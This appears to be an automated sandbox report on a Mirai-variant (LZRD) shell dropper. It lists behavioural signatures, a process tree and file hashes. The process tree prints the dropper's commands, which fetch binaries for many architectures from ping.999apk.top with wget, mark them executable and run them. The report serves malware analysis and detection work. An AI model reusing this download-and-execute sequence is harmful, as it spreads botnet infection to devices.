Analysis
-
max time kernel
23s -
max time network
31s -
platform
linux_mips -
resource
debian9-mipsbe-en-20211208 -
resource tags
arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30-04-2023 13:01
Static task
static1
Behavioral task
behavioral1
Sample
D.sh
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
D.sh
Resource
debian9-armhf-20221111-en
Behavioral task
behavioral3
Sample
D.sh
Resource
debian9-mipsbe-en-20211208
General
-
Target
D.sh
-
Size
1KB
-
MD5
e41b9523a8373b79498bef2473723adf
-
SHA1
bd468f9718ef86d34c88552dd01464f85e8e2ee5
-
SHA256
27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e
-
SHA512
0b933fcf0f8a24ffd62431f47469529fce2170307777a632d74af893902af3ba60a14076a74874354c7667b39e5ebf37a2f6f1e9d145599d22c2fbbb03f31476
Malware Config
Extracted
mirai
LZRD
Signatures
-
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
-
Writes file to system bin folder 1 TTPs 2 IoCs
Processes:
description ioc File opened for modification /sbin/watchdog File opened for modification /bin/watchdog -
Executes dropped EXE 9 IoCs
Processes:
wgetcatcatchmodBTwgetcatpid process 332 wget 338 cat 346 cat 352 chmod 358 BT 364 wget 370 cat 376 382 -
Processes:
resource yara_rule /tmp/x86 upx /tmp/BT upx /tmp/mips upx /tmp/BT upx /tmp/x86_64 upx /tmp/BT upx /tmp/mpsl upx /tmp/BT upx /tmp/arm upx /tmp/BT upx /tmp/arm5 upx /tmp/BT upx /tmp/arm6 upx /tmp/BT upx /tmp/arm7 upx /tmp/BT upx /tmp/ppc upx /tmp/BT upx -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/mpsl wget File opened for modification /tmp/arm wget File opened for modification /tmp/arm7 wget File opened for modification /tmp/ppc wget File opened for modification /tmp/x86 wget File opened for modification /tmp/BT File opened for modification /tmp/x86_64 wget File opened for modification /tmp/mips wget File opened for modification /tmp/arm5 wget File opened for modification /tmp/arm6 wget
Processes
-
/tmp/D.sh/tmp/D.sh1⤵
-
wgetwget http://ping.999apk.top/x862⤵
- Writes file to tmp directory
-
catcat x862⤵
-
chmodchmod +x BT D.sh systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x862⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/mips2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
catcat mips2⤵
-
chmodchmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x862⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/arc2⤵
-
catcat arc2⤵
- Executes dropped EXE
-
chmodchmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x862⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/x86_642⤵
- Writes file to tmp directory
-
catcat x86_642⤵
-
chmodchmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/mpsl2⤵
- Writes file to tmp directory
-
catcat mpsl2⤵
- Executes dropped EXE
-
chmodchmod +x BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/arm2⤵
- Writes file to tmp directory
-
catcat arm2⤵
-
chmodchmod +x arm BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_642⤵
- Executes dropped EXE
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/arm52⤵
- Writes file to tmp directory
-
catcat arm52⤵
-
chmodchmod +x arm arm5 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_642⤵
-
./BT./BT2⤵
- Executes dropped EXE
-
wgetwget http://ping.999apk.top/arm62⤵
- Writes file to tmp directory
-
catcat arm62⤵
-
chmodchmod +x arm arm5 arm6 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/arm72⤵
- Executes dropped EXE
- Writes file to tmp directory
-
catcat arm72⤵
-
chmodchmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/ppc2⤵
- Writes file to tmp directory
-
catcat ppc2⤵
- Executes dropped EXE
-
chmodchmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_642⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/BTFilesize
21KB
MD50cb2516e0c4665363644396499cb7aec
SHA1995fc2ab54085422d82676b252a2bab06cdf5704
SHA2567113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1
SHA512d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88
-
/tmp/BTFilesize
18KB
MD50e6fe9b5313bd0deaffb51f2fbbe06cb
SHA16facd101542faf57dab7824909e0c3d29513da60
SHA2563ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863
SHA51243fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e
-
/tmp/BTFilesize
26KB
MD567110fddb816519a3d5d352b5f32bbbb
SHA16a541fce786c16301901087977b30476920e3382
SHA25614acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6
SHA512f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35
-
/tmp/BTFilesize
45KB
MD5db3001dc744f15e5dfd694e26b57979c
SHA19fde5950b212a39e94e15ed3347cca61d514a95b
SHA256076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e
SHA5121d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731
-
/tmp/BTFilesize
21KB
MD56260fc510dee1aef342de3bf2892bf7c
SHA14c5d1757ef56a3c4578f7db2949800b0a8b08005
SHA256f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4
SHA512b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72
-
/tmp/BTFilesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
/tmp/BTFilesize
23KB
MD55ffea0b004a955d227e947d486ab573f
SHA1de6fe607474109e92373ed4b6f54cb678e69f04f
SHA256472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02
SHA51293f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f
-
/tmp/BTFilesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
/tmp/BTFilesize
24KB
MD5d1d7efff7b9a9627879ceb1a79832a28
SHA15f88e33dec795ff429d2a44c7743d3bc948dcc19
SHA256c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d
SHA512301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c
-
/tmp/armFilesize
21KB
MD50cb2516e0c4665363644396499cb7aec
SHA1995fc2ab54085422d82676b252a2bab06cdf5704
SHA2567113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1
SHA512d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88
-
/tmp/arm5Filesize
18KB
MD50e6fe9b5313bd0deaffb51f2fbbe06cb
SHA16facd101542faf57dab7824909e0c3d29513da60
SHA2563ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863
SHA51243fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e
-
/tmp/arm6Filesize
26KB
MD567110fddb816519a3d5d352b5f32bbbb
SHA16a541fce786c16301901087977b30476920e3382
SHA25614acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6
SHA512f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35
-
/tmp/arm7Filesize
45KB
MD5db3001dc744f15e5dfd694e26b57979c
SHA19fde5950b212a39e94e15ed3347cca61d514a95b
SHA256076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e
SHA5121d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731
-
/tmp/mipsFilesize
23KB
MD55ffea0b004a955d227e947d486ab573f
SHA1de6fe607474109e92373ed4b6f54cb678e69f04f
SHA256472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02
SHA51293f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f
-
/tmp/mpslFilesize
24KB
MD5d1d7efff7b9a9627879ceb1a79832a28
SHA15f88e33dec795ff429d2a44c7743d3bc948dcc19
SHA256c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d
SHA512301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c
-
/tmp/ppcFilesize
21KB
MD56260fc510dee1aef342de3bf2892bf7c
SHA14c5d1757ef56a3c4578f7db2949800b0a8b08005
SHA256f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4
SHA512b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72
-
/tmp/x86Filesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
/tmp/x86_64Filesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
memory/338-1-0x00400000-0x00451a58-memory.dmp